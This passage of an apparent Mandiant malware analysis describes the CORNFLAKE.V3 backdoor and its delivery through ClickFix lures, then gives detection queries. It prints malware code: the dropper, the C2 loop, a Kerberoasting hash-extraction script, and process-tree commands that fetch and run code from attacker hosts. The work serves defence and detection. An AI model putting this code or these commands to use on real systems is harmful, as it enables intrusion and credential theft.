$Node = [System.IO.Path]::Combine($DestinationFolder, "node.exe")

# Start node.exe to execute the decoded string data as JavaScript, hidden.
start-process -FilePath "$Node" -ArgumentList "-e `"$StringData`"" 
-WindowStyle Hidden</code></pre></div>
<div class="block-paragraph_advanced"><p><span>The PowerShell dropper’s execution includes multiple steps:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Check if it is running inside a virtual machine and, if true, exit</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Download Node.js via HTTPS from the URL </span><code>hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip</code><span>, write the file to </span><code>%TEMP%\downloaded.zip</code><span> and extract its contents to the directory </span><code>%APPDATA%\node-v22.11.0-win-x64</code></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Base64 decode its embedded CORNFLAKE.V3 payload and execute it via the command </span><code>%APPDATA%\node-v22.11.0-win-x64\node.exe -e “&lt;base64_decoded_CORNFLAKE.v3&gt;”</code></p>
</li>
</ul>
<p><span>The PowerShell dropper's anti-vm checks include checking for low system resources (total memory less than 4GB or used memory less than 1.5GB) and if the target system's computer name matches the regular expression </span><code>DESKTOP-S*</code><span> or the target system's manufacturer is </span><code>QEMU</code><span>.</span></p>
<p><span>As a result of the dropper’s execution, a DNS query for the </span><code>nodejs[.]org</code><span> domain was made, followed by the download of an archive named </span><code>downloaded.zip</code> (<span>SHA256:</span> <code>905373a059aecaf7f48c1ce10ffbd5334457ca00f678747f19db5ea7d256c236</code>)<span>. This archive contained the Node.js runtime environment, including its executable file </span><code>node.exe</code><span>, which was then extracted to </span><code>%APPDATA%\node-v22.11.0-win-x64\</code><span>. The Node.js environment allows for the execution of JavaScript code outside of a web browser.</span></p>
<p><span>The extracted </span><code>%APPDATA%\node-v22.11.0-win-x64\node.exe</code><span> binary was then launched by Powershell with the </span><code>-e</code><span> argument, followed by a large Node.js script, a CORNFLAKE.V3 backdoor sample.</span></p>
<p><span>Mandiant identified the following activities originating from the CORNFLAKE.V3 sample:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Host and AD-based reconnaissance</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Persistence via Registry Run key</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Credential harvesting attempts via Kerberoasting</span></p>
</li>
</ul>
<p><span>The following process tree was observed during the investigation:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>explorer.exe 
     ↳ c:\windows\system32\windowspowershell\v1.0\powershell.exe 
-w h -c 
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"
          ↳ c:\users\&lt;user&gt;\appdata\roaming\node-v22.11.0-win-x64\node.exe 
-e "{CORNFLAKE.V3}" 
               ↳ c:\windows\system32\windowspowershell\v1.0\powershell.exe 
-c "{Initial check and System Information Collection}"
                    ↳ C:\Windows\System32\ARP.EXE -a
                    ↳ C:\Windows\System32\chcp.com 65001
                    ↳ C:\Windows\System32\systeminfo.exe 
                    ↳ C:\Windows\System32\tasklist.exe /svc
               ↳ c:\windows\system32\cmd.exe /d /s /c "wmic process where 
processid=16004 get commandline"
               ↳ C:\Windows\System32\cmd.exe /d /s /c "{Kerberoasting}"
               ↳ c:\windows\system32\cmd.exe /d /s /c 
"{Active Directory Reconnaissance}"
               ↳ c:\windows\system32\cmd.exe /d /s /c "reg add 
{ChromeUpdater as Persistence}" </code></pre></div>
<div class="block-paragraph_advanced"><h3><span>Analysis of CORNFLAKE.V3 </span></h3>
<p><span>The CORNFLAKE.V3 sample recovered in our investigation was completely unobfuscated, which allowed us to statically analyze it in order to understand its functionality. This section describes the primary functions of the malware.</span></p>
<h4><span>Initial Check and System Information Collection</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>if (process.argv[1] !== undefined &amp;&amp; process.argv[2] === undefined) {
    const child = spawn(process.argv[0], [process.argv[1], '1'], {
        detached: true,
        stdio: 'ignore',
        windowsHide: true,
    });
    child.unref();
    process.exit(0);
}</code></pre></div>
<div class="block-paragraph_advanced"><p><span>When the script initially executes, a check verifies the command line arguments of the </span><code>node.exe</code> <span>process, keeping in mind that the binary is initially spawned with a single argument (the script itself), this check forces the script to create a child process which has</span> <code>1</code><span> as an additional argument, then the initial </span><code>node.exe</code><span> exits. When the child process runs, since it now has three arguments, it will pass this initial check and execute the rest of the script.</span></p>
<p><span>This check allows the malware to ensure that only one instance of the script is executing at one time, even if it is launched multiple times due to its persistence mechanisms.</span></p>
<p><span>Following this, the malware attempts to collect system information using the following code:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>let cmd = execSync('chcp 65001 &gt; $null 2&gt;&amp;1 ; echo \'version: ' 
+ ver + '\' ; if ([Security.Principal.WindowsIdentity]::GetCurrent().Name 
-match '(?i)SYSTEM') { \'Runas: System\' } elseif 
(([Security.Principal.WindowsPrincipal] 
[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole
([Security.Principal.WindowsBuiltInRole]::Administrator)) 
{ \'Runas: Admin\' } else { \'Runas: User\' } ; systeminfo ; echo 
\'=-=-=-=-=-\' ; tasklist /svc ; echo \'=-=-=-=-=-\' ; Get-Service | 
Select-Object -Property Name, DisplayName | Format-List ; 
echo \'=-=-=-=-=-\' ; Get-PSDrive -PSProvider FileSystem | Format-Table 
-AutoSize ; echo \'=-=-=-=-=-\' ; arp -a', { encoding: 'utf-8', shell: 
'powershell.exe', windowsHide: true });

commandRet = Buffer.from(cmd, 'utf-8');

sysinfo = Buffer.concat([numberBufferInit, numberBufferId, commandRet]);</code></pre></div>
<div class="block-paragraph_advanced"><p><span>This code block executes a series of PowerShell commands (or fallback CMD commands if PowerShell fails) using </span><code>execSync</code><span>. It gathers the script's version, user privilege level (System, Admin, User), standard </span><span>systeminfo</span><span> output, running tasks/services (</span><code>tasklist /svc</code><span>), service details (</span><code>Get-Service</code><span>), available drives (</span><code>Get-PSDrive</code><span>), and the ARP table (</span><code>arp -a</code><span>).</span></p>
<h4><span>C2 Initialization</span></h4>
<p><span>After setting some logical constants and the command and control (C2) server IP address, the malware enters the </span><code>mainloop</code> <span>function. The script contains support for two separate lists, </span><code>hosts</code><span> and </span><code>hostsIP</code><span>, which are both used in the C2 communication logic. Initially, the </span><code>mainloop</code><span> function attempts to connect to a random host in the</span><span> </span><code>hosts</code><span> list, however, if unable to do so, it will attempt to connect to a random IP address in the </span><code>hostsIP</code><span> list instead. Once a connection is successfully established, the <code>main</code> </span><span>function is called.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>// Define lists of hostnames and IP addresses for the command 
and control server.
const hosts = ['159.69.3[.]151'];
const hostsIp = ['159.69.3[.]151'];

// Variables to manage the connection and retry logic.
let useIp = 0;
let delay = 1;

// Main loop to continuously communicate with the command 
and control server.
async function mainloop() {
    let toHost = hosts[Math.floor(Math.random() * 1000) % hosts.length];
    let toIp = hostsIp[Math.floor(Math.random() * 1000) % hostsIp.length];

    while (true) {
        // Wait for the specified delay.
        await new Promise((resolve) =&gt; setTimeout(resolve, delay));

        try {
            // Attempt to communicate with the command and control server.
            if (useIp &lt; 200) {
                await main(toHost, PORT_IP);
                useIp = 0;
            } else {
                await main(toIp, PORT_IP);
                useIp++;
                if (useIp &gt;= 210) useIp = 0;
            }
        } catch (error) {
            // Handle errors during communication.
            console.error('Error with HTTP request:', error.message);
            toHost = hosts[Math.floor(Math.random() * 1000) % 
hosts.length];
            toIp = hostsIp[Math.floor(Math.random() * 1000) % 
hostsIp.length];
            useIp++;
            delay = 1000 * 10;
            continue;
        }

        // Set the delay for the next attempt.
        delay = 1000 * 60 * 5;
    }
}</code></pre></div>
<div class="block-paragraph_advanced"><h3><span>C2 Communication</span></h3>
<p><span>This function, named </span><code>main</code><span>, handles the main command and control logic. It takes a host and port number as arguments, and constructs the data to be sent to the C2 server. The malware sends an initial POST request to the path </span><code>/init1234</code><span>, which contains information about the infected system and the output of the last executed command; the contents of this request are XOR-encrypted by the </span><code>enc</code><span> function.</span></p>
<p><span>This request is answered by the C2 with 2 possible responses:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><code>ooff</code><span> - the process exits</span></p>
</li>
<li aria-level="1">
<p role="presentation"><code>atst</code><span> - the <code>atst</code></span><span> function is called, which establishes persistence on the host</span></p>
</li>
</ul>
<p><span>If the response does not match one of the aforementioned 2 values, the malware interprets the response as a payload and parses the last byte of the response after XOR decrypting it. The following values are accepted by the program:</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Command</strong></p>
</td>
<td>
<p><strong>Type</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>0</span></p>
</td>
<td>
<p><span>EXE</span></p>
</td>
<td>
<p><span>The received payload is written to </span><code>%APPDATA%\&lt;random_8_chars&gt;\&lt;random_8_chars&gt;.exe</code><span> and launched using the Node.js </span><code>child_process.spawn()</code> <span>function</span><span>.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>1</span></p>
</td>
<td>
<p><span>DLL</span></p>
</td>
<td>
<p><span>The received payload is written to </span><code>%APPDATA%\&lt;random_8_chars&gt;\&lt;random_8_chars&gt;.dll</code><span> and launched using the Node.js </span><code>child_process.spawn()</code> <span>function</span><span> as an argument to </span><span>rundll32.exe</span><span>.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2</span></p>
</td>
<td>
<p><span>JS</span></p>
</td>
<td>
<p><span>The received payload is launched from memory as an argument to </span><span>node.exe </span><span>using the Node.js </span><code>child_process.spawn()</code> <span>function</span><span>.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>3</span></p>
</td>
<td>
<p><span>CMD</span></p>
</td>
<td>
<p><span>The received payload is launched from memory as an argument to </span><code>cmd.exe</code> <span>using the Node.js </span><code>child_process.spawn()</code> <span>function</span><span>. Additionally, the output is saved in the </span><code>LastCmd</code><span> variable and sent to the C2 in the next request.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>4</span></p>
</td>
<td>
<p><span>Other</span></p>
</td>
<td>
<p><span>The payload is written to </span><code>%APPDATA%\&lt;random_8_chars&gt;\&lt;random_8_chars&gt;.log</code><span>.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div><span>Table 2: CORNFLAKE.V3 supported payloads</span></div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Persistence</span></h4>
<p><span>The </span><span>atst</span><span> function, called by <code>main</code></span><span>, attempts to establish persistence on the host by creating a new registry Run key named </span><code>ChromeUpdater</code> <span>under </span><code>HKCU\Software\Microsoft\Windows\CurrentVersion\Run</code><span>.</span></p>
<p><span>The malware uses </span><code>wmic.exe</code><span> to obtain the command line arguments of the currently running </span><code>node.exe</code><span> process. If </span><code>node.exe</code><span> was launched with the </span><code>-e</code><span> argument, like the malware does initially, the script extracts the argument after </span><code>-e</code><span>, which contains the full malicious script. This script is written to the </span><code>&lt;random_8_chars&gt;.log</code><span> file in the Node.js installation directory and its path is saved to the </span><code>path2file</code><span> variable.</span></p>
<p><span>If </span><code>node.exe</code><span> was instead launched with a file as an argument (such as during the persistence phase), the path to this file is extracted and saved to the </span><code>path2file</code><span> variable.</span></p>
<p><span>The </span><code>path2file</code><span> variable is then set as an argument to</span> <code>node.exe</code><span> in the newly created </span><code>ChromeUpdater</code><span> registry key. This ensures that the malware executes upon user logon.</span></p>
<h3><span>Executed Payloads</span></h3>
<p><span>As observed in the main </span><span>function, this sample can receive and execute different types of payloads from its C2 server. This section describes two payloads that were observed in our investigation.</span></p>
<h4><span>Active Directory Reconnaissance</span></h4>
<p><span>The first payload observed on the host was a batch script containing reconnaissance commands. The script initially determines if the host is domain-joined, this condition determines which specific reconnaissance type is executed.</span></p>
<h5><span>Domain Joined</span></h5>
<ul>
<li role="presentation"><span>Query Active Directory Computer Count</span><span>: Attempts to connect to Active Directory and count the total number of computer objects registered in the domain.</span></li>
<li role="presentation"><span>Display Detailed User Context</span><span>: Executes</span><span> </span><code>whoami /all</code><span> to reveal the current user's Security Identifier (SID), domain and local group memberships, and assigned security privileges.</span></li>
<li role="presentation"><span>Enumerate Domain Trusts</span><span>: Executes </span><code>nltest /domain_trusts</code><span> to list all domains that the current computer's domain has trust relationships with (both incoming and outgoing).</span></li>
<li role="presentation"><span>List Domain Controllers</span><span>: Executes </span><code>nltest /dclist :</code><span> to find and list the available Domain Controllers (DCs) for the computer's current domain.</span></li>
<li role="presentation"><span>Query Service Principal Names (SPNs)</span><span>: Executes </span><code>setspn -T &lt;UserDomain&gt; -Q */*</code> <span>to query for all SPNs registered in the user's logon domain, then filters the results (Select-String) to specifically highlight SPNs potentially associated with user accounts (lines starting CN=...Users).</span></li>
</ul>
<h5><span>Not Domain Joined</span></h5>
<ul>
<li role="presentation"><span>Enumerate Local Groups</span><span>: Uses </span><code>Get-LocalGroup</code><span> to list all security groups defined locally on the machine.</span></li>
<li role="presentation"><span>Enumerate Local Group Members</span><span>: For each local group found, uses </span><code>Get-LocalGroupMember</code><span> to list the accounts (users or other groups) that are members of that group, displaying their Name and PrincipalSource (e.g., Local, MicrosoftAccount).</span></li>
</ul>
<h4><span>Kerberoasting</span></h4>
<p><span>The second script executed is a batch script which attempts to harvest credentials via Kerberoasting. The script queries Active Directory for user accounts configured with SPNs (often an indication of a service account using user credentials). For each of these, it requests a Kerberos service ticket from which a password hash is extracted and formatted. These hashes are exfiltrated to the C2 server, where the attacker can attempt to crack them.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>$a = 'System.IdentityModel';
$b = [Reflection.Assembly]::LoadWithPartialName($a);
$c = New - Object DirectoryServices.DirectorySearcher([ADSI]'');
$c.filter = '(&amp;(servicePrincipalName=*)(objectCategory=user))';
$d = $c.Findall();
foreach($e in $d) {
    $f = $e.GetDirectoryEntry();
    $g = $f.samAccountName;
    if ($g  - ne 'krbtgt')  {
        Start - Sleep  - Seconds (Get - Random  - Minimum 1  
- Maximum 11);
        foreach($h in $f.servicePrincipalName) {
            $i = $null;
            try {
                $i = New - 
Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken  
- ArgumentList $h;
            } catch {}
            if ($i  - ne $null)  {
                $j = $i.GetRequest();
                if ($j)  {
                    $k = [System.BitConverter]::ToString($j) - replace'-';
                    [System.Collections.ArrayList]$l = 
($k - replace'^(.*?)04820...(.*)', '$2') - Split'A48201';
                    $l.RemoveAt($l.Count - 1);
                    $m = $l - join'A48201';
                    try {
                        $m = $m.Insert(32, '$');
                        $n = '$krb5tgs$23$*' + $g + '/' + $h + '*$' + $m;
                        Write - Host $n;
                        break;
                    } catch {}}}}}}</code></pre></div>
<div class="block-paragraph_advanced"><h3><span>PHP Variant</span></h3>
<p><span>Mandiant Threat Defense recently observed a new PHP-based CORNFLAKE.V3 variant which has similar functionality to the previous Node.js based iterations.</span></p>
<p><span>This version was dropped by an in-memory script which was executed as a result of interaction with a malicious ClickFix lure page.</span></p>
<p><span>The script downloads the PHP package from </span><code>windows.php[.]net</code><span>,</span><span> </span><span>writes it to disk as </span><code>php.zip</code><span> </span><span>and extracts its contents to the </span><code>C:\Users\&lt;User&gt;\AppData\Roaming\php\</code><span> </span><span>directory</span><span>. </span><span>The CORNFLAKE.V3 PHP sample is contained in the</span> <code>config.cfg</code><span> file that was also dropped in the same directory and executed with the following command line arguments:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>"C:\\Users\&lt;User&gt;\AppData\Roaming\php\php.exe" -d extension=zip -d 
extension_dir=ext C:\Users\&lt;User&gt;\AppData\Roaming\php\config.cfg 1</code></pre></div>
<div class="block-paragraph_advanced"><p><span>To maintain persistence on the host, this variant utilizes a registry Run key named after a randomly chosen directory in </span><code>%APPDATA%</code><span> or </span><code>%LOCALAPPDATA%</code><span> instead of the fixed </span><code>ChromeUpdater</code><span> string used in the Node.js version. To communicate with its C2 a unique path is generated for each request, unlike the static</span> <code>/init1234</code><span> path:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>POST /ue/2&amp;290cd148ed2f4995f099b7370437509b/fTqvlt HTTP/1.1  
Host: varying-rentals-calgary-predict.trycloudflare[.]com  
Connection: close  
Content-Length: 39185  
Content-type: application/octet-stream</code></pre></div>
<div class="block-paragraph_advanced"><p><span>Much like the Node.js</span><span> version, the last byte of the received payload determines the payload type, however, these values differ in the PHP version:</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><strong>Command</strong></p>
</th>
<th scope="col">
<p><strong>Type</strong></p>
</th>
<th scope="col">
<p><strong>Notes</strong></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><span>0</span></p>
</td>
<td>
<p><span>EXE</span></p>
</td>
<td>
<p><span>This decrypted content is saved to a temporary executable file (</span><code>&lt;rand_8_char&gt;.exe</code><span>) created in a random directory within the user's </span><code>%APPDATA%</code><span> folder, and executed through </span><code>PowerShell</code><span> as a hidden process.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>1</span></p>
</td>
<td>
<p><span>DLL</span></p>
</td>
<td>
<p><span>The decrypted content is saved as a </span><code>&lt;rand_8_char&gt;.png</code><span> file in a temporary directory within the user's </span><code>%APPDATA%</code><span> folder. Subsequently, </span><code>rundll32.exe</code><span> is invoked to execute the downloaded file.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2</span></p>
</td>
<td>
<p><span>JS</span></p>
</td>
<td>
<p><span>This decrypted content is saved as a </span><code>&lt;rand_8_char&gt;.jpg</code><span> file in a temporary directory within the user's </span><code>%APPDATA%</code><span> folder. The script attempts to check if </span><code>Node.js</code><span> is installed. If </span><code>Node.js</code><span> is not found or fails to install from a hardcoded URL (</span><code>http://nodejs[.]org/dist/v21.7.3/node-v21.7.3-win-x64.zip</code><span>), an error message is printed. If </span><code>Node.js</code><span> is available, the downloaded JavaScript (</span><code>.jpg</code><span>) file is executed using </span><code>node.exe</code><span>.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>3</span></p>
</td>
<td>
<p><span>CMD</span></p>
</td>
<td>
<p><span>This decrypted data is executed as a provided command string via </span><code>cmd.exe</code><span> or </span><code>powershell.exe</code><span>.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>4</span></p>
</td>
<td>
<p><span>ACTIVE</span></p>
</td>
<td>
<p><span>This command reports the </span><code>active_cnt</code><span> (stored in the </span><code>$qRunq</code><span> global variable) to the C2 server. This likely serves as a heartbeat or activity metric for the implant.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>5</span></p>
</td>
<td>
<p><span>AUTORUN</span></p>
</td>
<td>
<p><span>The malware attempts to establish persistence by adding a registry entry in </span><code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code><span> that points to the script's </span><code>PHP</code><span> binary and its own path.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>6</span></p>
</td>
<td>
<p><span>OFF</span></p>
</td>
<td>
<p><span>This command directly calls </span><code>exit(0)</code><span>, which terminates the PHP script's execution.</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>OTHER</span></p>
</td>
<td>
<p><span>If none of the specific commands match, the received data is saved as a </span><code>.txt</code><span> file in a temporary directory within the user's </span><code>%APPDATA%</code><span> folder.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div><span>Table 3: CORNFLAKE.V3 PHP variant supported payloads</span></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><p><span>The Javascript payload execution functionality was retained by implementing the download of the Node.js runtime environment inside the </span><code>JS</code><span> command. Other notable changes include the change of the </span><code>DLL</code><span> and </span><code>JS</code><span> payload file extensions into </span><code>.png</code><span> and </span><code>.jpg</code><span> to evade detection and the addition of the </span><code>ACTIVE</code><span> and </span><code>AUTORUN</code><span> commands. However, the main functionality of the backdoor remains unchanged despite the transition from Node.js to PHP.</span></p>
<p><span>These changes suggest an ongoing effort by the threat actor to refine their malware against evolving security measures.</span></p>
<h3><span>Executed Payloads</span></h3>
<h4><span>Active Directory Reconnaissance</span></h4>
<p><span>A </span><span>cmd.exe</span><span> reconnaissance payload similar to the one encountered in the Node.js variant </span><span>was received from the C2 server and executed. The script checks if the machine is part of an Active Directory domain and collects the following information using powershell:</span></p>
<h5 role="presentation"><span>Domain Joined</span></h5>
<ul>
<li aria-level="1">
<p role="presentation"><span>Total count of computer accounts in AD.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Domain trust relationships.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>List of all Domain Controllers.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Members of the "Domain Admins" group.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>User accounts configured with a Service Principal Name (SPN).</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>All local groups and their members</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Current User name, SID, local group memberships and security privileges</span></p>
</li>
</ul>
<h5 role="presentation"><span>Not Domain Joined</span></h5>
<ul>
<li aria-level="1">
<p role="presentation"><span>All local groups and their members</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Current User name, SID, local group memberships and security privileges</span></p>
</li>
</ul>
<p><span> </span></p>
<h4><span>WINDYTWIST.SEA Backdoor</span></h4>
<p><span>Following the interaction with its C2 server, a DLL payload (corresponding to command </span><span>1</span><span>) was received, written to disk as </span><code>C:\Users\&lt;User&gt;\AppData\Roaming\Shift194340\78G0ZrQi.png</code> <span>and executed using </span><code>rundll32</code><span>. This file was a </span><code>WINDYTWIST.SEA</code><span> backdoor implant configured with the following C2 servers:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>tcp://167.235.235[.]151:443
tcp://128.140.120[.]188:443
tcp://177.136.225[.]135:443</code></pre></div>
<div class="block-paragraph_advanced"><p><span>This implant is a C version of the Java </span><code>WINDYTWIST</code><span> backdoor, which supports relaying TCP traffic, providing a reverse shell, executing commands, and deleting itself. In previous intrusions, Mandiant observed </span><code>WINDYTWIST.SEA</code><span> samples attempting to move laterally in the network of the infected machine.</span></p>
<p><span>The following process tree was observed during the infection:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>explorer.exe
    ↳ C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe 
"-c irm dnsmicrosoftds-data[.]com/log/out | clip; &amp; 
([scriptblock]::Create((Get-Clipboard) -join 
(""+[System.Environment]::NewLine)))"
       ↳ C:\WINDOWS\system32\clip.exe
       ↳ C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe 
"-w H -c irm windows-msg-as[.]live/qwV1jxQ"
       ↳ C:\WINDOWS\system32\systeminfo.exe
       ↳ C:\Users\&lt;user&gt;\AppData\Roaming\php\php.exe "-d extension=zip 
-d extension_dir=ext C:\Users\&lt;user&gt;\AppData\Roaming\php\config.cfg 
1 {CORNFLAKE.V3}"
          ↳ cmd.exe /s /c "powershell -c 
{Multiple PS Commands for Host Reconnaissance}"
          ↳ cmd.exe /s /c "powershell -c 
{Multiple PS Commands for Host Reconnaissance}"
          ↳ cmd.exe /s /c "reg add 
HKCU\Software\Microsoft\Windows\CurrentVersion\Run 
/v "random_appdata_dirname" /t REG_SZ /d "\"&lt;php_binary_path&gt;" 
\"&lt;script_path&gt;"" /f"
          ↳ powershell.exe
             ↳ C:\Windows\System32\rundll32.exe 
"{WINDYTWIST.SEA Backdoor}" start</code></pre></div>
<div class="block-paragraph_advanced"><h3><span>Conclusion</span></h3>
<p><span>This investigation highlights the collaborative nature of modern cyber threats, where UNC5518 leverages compromised websites and deceptive ClickFix lures to gain initial access. This access is then utilized by other actors like UNC5774, who deploy versatile malware such as the CORNFLAKE.V3 backdoor. The subsequent reconnaissance and credential harvesting activities we observed indicate that the attackers intend to move laterally and expand their foothold in the environment.</span></p>
<p><span>To mitigate malware execution through ClickFix, organizations should disable the Windows Run dialog box where possible. Regular simulation exercises are crucial to counter this and other social engineering tactics. Furthermore, robust logging and monitoring systems are essential for detecting the execution of subsequent payloads, such as those associated with CORNFLAKE.V3.</span></p>
<h3><span>Acknowledgements</span></h3>
<p><span>Special thanks to Diana Ion, Yash Gupta, Rufus Brown, Mike Hunhoff, Genwei Jiang, Mon Liclican, Preston Lewis, Steve Sedotto, Elvis Miezitis and Rommel Joven for their valuable contributions to this blog post.</span></p>
<h3><span>Detection Through Google Security Operations</span></h3>
<p><span>For detailed guidance on hunting for this activity using the following queries, and for a forum to engage with our security experts, please visit our companion post on the</span> <a href="https://security.googlecloudcommunity.com/community-blog-staging-private-71/a-cereal-offender-analyzing-the-cornflake-v3-backdoor-5682" rel="noopener" target="_blank"><span>Google Cloud Community blog</span></a><span>.</span></p>
<p><span>Mandiant has made the relevant rules available in the Google SecOps Mandiant Frontline Threats curated detections rule set. The activity discussed in the blog post is detected in Google SecOps under the rule names:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Powershell Executing NodeJS</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Powershell Writing To Appdata</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious Clipboard Interaction</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>NodeJS Reverse Shell Execution</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Download to the Windows Public User Directory via PowerShell</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Run Utility Spawning Suspicious Process</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>WSH Startup Folder LNK Creation</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Trycloudflare Tunnel Network Connections</span></p>
</li>
</ul>
<h4><span>SecOps Hunting Queries</span></h4>
<p><span>The following UDM queries can be used to identify potential compromises within your environment.</span></p>
<h5><span>Execution of CORNFLAKE.V3 — Node.js </span></h5>
<p><span>Search for potential compromise activity where PowerShell is used to launch node.exe from %AppData% path with the -e argument, indicating direct execution of a malicious JavaScript string.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>metadata.event_type = "PROCESS_LAUNCH"
principal.process.file.full_path = /powershell\.exe/ nocase
target.process.file.full_path = /appdata\\roaming\\.*node\.exe/ nocase
target.process.command_line = /"?node\.exe"?\s*-e\s*"/ nocase</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>Execution of CORNFLAKE.V3 — PHP</span></h5>
<p><span>Search for compromise activity where PowerShell is executing php.exe from %AppData% path. This variant is characterized by the use of the -d argument, executing a PHP script without a .php file extension, and passing the argument 1 to the PHP interpreter, indicating covert execution of malicious PHP code.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>metadata.event_type = "PROCESS_LAUNCH"
principal.process.file.full_path = /powershell\.exe/ nocase
target.process.file.full_path = /appdata\\roaming\\.*php\.exe/ nocase
target.process.command_line = /"?php\.exe"?\s*-d\s.*1$/ nocase
target.process.command_line != /\.php\s*\s*/ nocase</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>CORNFLAKE.V3 Child Process Spawns</span></h5>
<p><span>Search suspicious process activity where cmd.exe or powershell.exe are spawned as child processes from node.exe or php.exe when those executables are located in %AppData%.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>metadata.event_type = "PROCESS_LAUNCH"
principal.process.file.full_path = 
/appdata\\roaming\\.*node\.exe|appdata\\roaming\\.*php\.exe/ nocase 
target.process.file.full_path = /powershell\.exe|cmd\.exe/ nocase</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>Suspicious Connections to Node.js/PHP Domains</span></h5>
<p><span>Search unusual network connections initiated by powershell.exe or mshta.exe to legitimate Node.js (nodejs.org) or PHP (windows.php.net) infrastructure domains.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>metadata.event_type = "NETWORK_CONNECTION"
principal.process.file.full_path = /powershell\.exe|mshta\.exe/ nocase 
target.hostname = /nodejs\.org|windows\.php\.net/ nocase</code></pre></div>
<div class="block-paragraph_advanced"><h3><span>Indicators of Compromise (IOCs)</span></h3>
<p><span>A <a href="https://www.virustotal.com/gui/collection/dc4207feb8863f26779d067a40b20d7e80b8d225f54ea16e24dcc7493a70d9b9" rel="noopener" target="_blank">Google Threat Intelligence (GTI) collection of IOCs</a> is available to registered users</span><span>.</span></p>
